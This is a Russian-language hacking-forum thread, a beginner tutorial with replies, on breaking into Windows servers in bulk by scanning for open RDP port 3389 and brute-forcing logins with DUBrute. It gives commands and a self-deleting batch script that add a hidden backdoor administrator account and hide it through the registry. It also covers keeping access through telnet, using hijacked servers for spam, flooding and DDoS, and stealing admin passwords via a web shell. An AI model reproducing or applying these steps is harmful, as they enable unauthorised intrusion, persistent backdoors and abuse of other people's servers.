Доброе время суток. Делал эту статью около 2-3х лет назад. Но она не утратила свою актуальность и по сей день. Т.к в наше время парс дедов происходит именно так как описанно в этой статье. Подобные темы уже были на форуме, но здесь я буду говорить именно о массовом взломе дедов. (Например для продажи) Те кто знаком с опытом парса дедов, могут смело покинуть эту тему. Плюсы данной статьи является то что даже абсолютно нулевой новичек, не знающий что такое дедик, прочитав эту статью получит достаточные знания для парса деда итд. К данной статье прилагается видео.. ссылка будет в конце темы. Пожалуй начнем. Раздел первый (Что такое дедик, зачем он нужен?) Дедик - очевидно, пошло от английского слова "dedicated", что с англиского значит выделенный. То есть Dedicated Server - выделенный сервер. Дедики, как их принято называть, на которых имеются довольно мощные сетевые интерфейсы, каналы и довольно не слабая аппаратная конфигурация служат для обработки данных, а также для хранения баз данных или любого другого материала находящегося на них для обслуживания персонала, фирмы или организации. Как подключиться к дедику? Подключиться к дедику можно с помошью встроеного в ОС windows утилиты: Подключение к удаленному рабочему столу. Пуск => Программы => Стандартные => Связь => Подключение к удаленному рабочему столу. Можно еще так: Пуск => Выполнить => mstsc. Еще одно утилита для подключение к дедику - это [BL4CK] VNC Viewer: Authentication Bypass. Просто запусти ее и вводи ip адрес дедика. Зачем нужен дедик??? Ну к примеру для брута, флуда, спама icq, мыла, для Ddos. Приведу пример: Ты хочешь иметь красивый номер ICQ =) но не хочешь ставить брут на свой компьютер. Так как это долго, и слишком грузит твою машину. Для этого есть дед! Ставь брут на дедик, выключай свое железо, и иди гуляй. Возвращайся через несколько часов, и забирай свои красивенькие номера на здоровье! Где достать дедик? Есть несколько способов добыть дед 1. Купить 2. Взять на раздачах какого-либо форума 3. Спарсить (сбрутить) 4. Закинуть скрытый радмин(либо какой-либо батник на открытие портов) на машину юзера. Как залить файлы на дедик? Запакуй все файлы, весь софт в один архив, залей на файлообменик например: slil.ru, depositfiles. И другие. Возьми ссылку на скачивание, зайди в браузер дедика, и скачай всё своё добро на дед.. Раздел второй (как маскироваться на дедике?) Для начала нужно создать нам свою учётку. Потому что если мы будем сидеть через учётку админа, то это 90% что он нас пропалит! А нам этого не надо! Итак читай внимательно как сделать на чужом дедике свою учётку, и скрыть её! Делать это мы будем через командную строку! Запускаем командную строку (Пуск > Выполнить > cmd.exe) и пишем в ней: Code: net user ([B]тут пишем логин и пароль учётки которую мы будем создовать! Делаем это через пробел.[/B]) /add net localgroup Administrators ([B]Тут указываем имя которое вы должны были указать в первой строке[/B]) /add net localgroup "Remote Desktop Users" ([B]Тут тоже указываем имя которое указали в строке выше)[/B] /add net accounts /maxpwage:unlimited Допустим вы хотите создать учётную запись с именем admin, и паролем test. Тогда у вас должно вот что получиться: Code: net user [B]admin test[/B] /add net localgroup Administrators [B]admin[/B] /add net localgroup "Remote Desktop Users" [B]admin[/B] /add net accounts /maxpwage:unlimited Надеюсь понятно. Разберём каждую строку: Code: net user Имя_пользователя пароль /add - [COLOR=Green]Добавляет нового пользователя с указанным именем и паролем[/COLOR] net localgroup Administrators Имя_пользователя /add - [COLOR=Green]Добавляет нужного пользователя к группе администраторов[/COLOR] net localgroup "Remote Desktop Users" Имя_пользователя /add - [COLOR=Green]Добавляет нужного пользователя к группе удалённых пользоваелей[/COLOR] net accounts /maxpwage:unlimited - [COLOR=Green]позволяет избежать истечения срока действия пароля (14 дней)[/COLOR] Едем дальше. Тепрь нам нужно скрыть учётку чтобы она не была видна среди других пользователей. Для этого заходим в реестер (Пуск > Выполнить > regedit.exe) переходим в HKEY_LOCAL_MACHINEHKEY_LOCAL_MACHINESOFTWARE Microsoft Windows NT CurrentVersion Winlogon SpecialAccounts UserList и создаём там новый параметр DWORD (правой кнопкой мыши,новый параметр DWORD) Называем этот параметр именем твоего аккаунта,и присваиваем ему численное значение 0. Дальше нам нужно скрыть папку с нашим акком, со всеми подкатологами, и файлами. Для этого идём в Cocuments and Settings и скрываем там нашу папку. (Правой кнопкой мыши > свойства > ставим галочку на "скрытый" и жмём применить) Дальше идём в C:WINDOWSsystem32 и создаём папку (название любое) Но вот и всё теперь ты можешь спокойно заходить на дедик под своим логином, и паролем. Теперь после того как мы вошли под своим логином и паролем нужно скрыть папку которую мы сделали. Это делается правой кнопкой мыши. Раздел третий (Как брутить дедики) Вот и настало время для самого интересного раздела! Сейчас я вам буду рассказывать, как можно взламывать деды (брутить). Итак начнём. Нам понадобиться. 1) Сканер я советую Angry ip Scanner (Этот сканер я использую сам) 2) Брут я советую DUBrut (Этот брут я использую сам) 3) Дед. Взять его вы сможете в любых раздачах дедов на форуме. Итак приступим. Заходим на дедик. Качаем сканер, и брут на дедик сохраняем в нашей папке. Запускаем сканер и настраиваем. 1) Открываем сканер. И ставим порт 3389. 2) выбираем диапазон ip 3) Нажимаем "Start" Даллее у нас начнётся скан. После скана жмём File/Export all... И выбираем куда сохранить наши диапазоны. Со сканом мы закончили, теперь поработаем с брутом. Тепрь разархивируем брут на дедик. Создайте специальную папку для брута, а то будете путаться. Разархировали? Врубаем брут, заполняем все нужные нам поля в настройках (думаю писать о потоках итд не нужно). Брутить будем порсканий рванные айпи с открытым портом (3389), которые нам выдал наш скан.. Нажимаем старт. Ждем пока пробрутится наш диапазон. Можете закрыть дедик и сходить погулять. После того как вы пришли с улицы заходим на дедик, и смотрим good.txt, и радуемся новыми дедиками. Раздел четвёртый (часто задаваемые вопросы) 1. Вопрос: Почему я немогу подключиться к деду? Ответ: Скорей всего админ поменял пароль, или закрыл доступ к своему компьютеру, то есть закрыл порт 3389. 2. Вопрос: Почему я не могу создать свою учётку на дедике? Ответ: Скорей всего вы попали на компьютер обычного пользователя (не администартора). А обычные пользователи не могут создовать учётки. 3. Вопрос: Как узнать правильно ли я ввожу команды, для создания учётки? Ответ: Если у вас после каждой команды выходит надпись: Code: The command copleted successfully. Ну вот впринцепи и все. Я знаю что многие пункты можно было опустить.. но когда я писал эту статью, она была предназначена чисто для новичков.. чтоб каждый смог разобраться в этой небольшой, но интересной сфере. Надеюсь и вам понравилась моя статься.. Видео по всему вышеописанному можно скачать тут >>> http://dfiles.ru/ru/files/7yp7chygo Всем спасибо за внимание с вами был Shade
забыл добавить.. если вам дорог какой-либо дед, то можно открыть на нем порт телнета. чтоб всегда можно было его(дедик) вернуть.
Code: Как залить файлы на дедик? Запакуй все файлы, весь софт в один архив, залей на файлообменик например: slil.ru, depositfiles. И другие. Возьми ссылку на скачивание, зайди в браузер дедика, и скачай всё своё добро на дед.. Какойто школьный способ В mstsc можно перед подключением расшарить нужный диск и его будет видно в "моём компьютере" на дедике
Давненько писал Всем привет , гулял по grabberz.com наткнулся на тему где человек хотел создать новую учетную запись через Telnet. Решил помочь и описать подробный способ по настройке сервера и клиента telnet. И так начнем , заходим на наш сервер , далее идем Пуск(Start) / Администрирование (Administrative tools) / Диспетчер серверов (Server manager) переходим во вкладку Особенности (Features) Там нажимаем Add Features , ставим галочку на Telnet server , нажимаем Next , Далее Install После установки нужно запустить службу telnet. 1) Пуск(Start) / Администрирование (Administrative tools) / Службы (Services) 2) Win + R -> services.msc Кликаем 2 раза по службе telnet в появившемся окне запускаем службу. И так Сервер telnet уже работает , теперь нам нужно добавить учетную запись в группу TelnetClients. Так настройка на сервере завершена , теперь займемся настройкой клиента Telnet - если у нас он уже не настроен , настройку я произвожу на Windows 7 , так как под рукой только она. Открываем консоль и пишем telnet , если telnet не настроен , то вы получите такоё сообщение как ниже на рисунке. Для настройки идем Пуск / Панель управления / Программы и компоненты / и выбираем Включение или отключение компонентов Windows , в появившемся окне ставим галочку на Клиент Telnet и нажимаем ОК. После завершения установки вновь открываем консоль и пишем telnet и получаем такой результат. Чтобы подключится к нашему серверу напишите команду o ip-дедика порт ( Стандартный порт telnet 23 ) , после подключения соглашаемся написав y. После подключения нас попросят ввести данные учетной записи - логин и пароль Жмем Enter все , теперь мы можешь создать учетную запись используя команду: net user логин пароль /add net localgroup Administrators логин /add net localgroup "Remote Desktop Users" логин /add net accounts /maxpwage:unlimited Получаем результат P.S. Работу телнет могут блокировать NAT , фаирвол и т.д © DServers.ru
Инет днем/ночью 20/40 Мбит/сек В DUBrute APPS - выше 5 не поднимается ! Конфиг компа нормальный.... В чем причина такой маленькой скорости перебора может быть ? // разобрался потоков мало по умолчанию стояло =)))
Взял твою статью себе на сайт. Все копирайты проставил. Статью немного изменил(об этом написал) ссылка Если против - удалю)
The specified target is unknown or unreachable Кто-нибудь знает как быть, если дед выдает "the specified target is unknown or unreachable"? винда 7
После того как вводишь пароль и логин в форму, нет, эти деды они не на линуксе, обычно WinServer 2003, 2008
Господа! Кто может подсказать, если при вводе net localgroup Administrators Имя_пользователя /add пишет, что указанной группы не существует. Какие возможные пути решения? Сервер российский
Спасибо, zeoman! Парни, кто-то еще пользует DUBrut или есть в паблике что-то получше? У меня почему-то сходу все в Error падает. Или так и должно быть? Подскажите, плиз))
Я чет не понял, в файлик соурс в разделе [IP] что должно быть? Список IP такой: 149.86.105.16 149.86.105.17 149.86.105.18 И т.д. Или диапазон: 149.86.105.16-149.87.105.16 Как?
Это может быть из за плохого интернета и если много логинов и паролей из за того, что много подключений может кидать в Error у меня так же было я оставил наиболее используемые логины и пароли поставил меньше потоков и все стало нормально Если речь идет о генерации в бруте DUBrute туда нужно вносить ip адреса с открытыми портами для брута Если речь идет чекере например vnc scanner gui туда нужно вносить диапазоны
Есть wso шелл на дедике (OC Windows), через консоль можно посмотреть списки файлов, а можно как нибудь добавить новый юзер и пароль или украсть логин пароля администратора?
Спасибо, сделал как вы написали. net user логин пароль /add - Успешно выполнено net localgroup Administrators логин /add - не выполняются net localgroup "Remote Desktop Users" логин /add - не выполняются net accounts /maxpwage:unlimited - Успешно выполнено когда добавлю net localgroup Администраторы логин /add пишет, что указанной группы не существует, чтобы узнать группу пишу net localgroup на этот раз пишут Code: net localgroup 2>&1 Системная ошибка 1312. Указанный сеанс работы не существует. Возможно, он уже завершен. Что посоветуйте ????
закинь ето все в батник Code: Set AdmGroupSID=S-1-5-32-544 Set AdmGroup= For /F "UseBackQ Tokens=1* Delims==" %%I In (`WMIC Group Where "SID = '%AdmGroupSID%'" Get Name /Value ^| Find "="`) Do Set AdmGroup=%%J Set AdmGroup=%AdmGroup:~0,-1% net user ADMINNAME PASSWORDADMIN /add net localgroup %AdmGroup% ADMINNAME /add Set RDPGroupSID=S-1-5-32-555 Set RDPGroup= For /F "UseBackQ Tokens=1* Delims==" %%I In (`WMIC Group Where "SID = '%RDPGroupSID%'" Get Name /Value ^| Find "="`) Do Set RDPGroup=%%J Set RDPGroup=%RDPGroup:~0,-1% net localgroup "%RDPGroup%" ADMINNAME /add net accounts /maxpwage:unlimited reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v ADMINNAME /t REG_DWORD /d 0 /f pause del %0 где ADMINNAME - логин админа PASSWORDADMIN - пароль админа
Здравствуйте ребята, извините за глупый вопрос. есть доступ на windows server 2012. как добавить новый админ через консоль? http://goo.gl/9BRIJg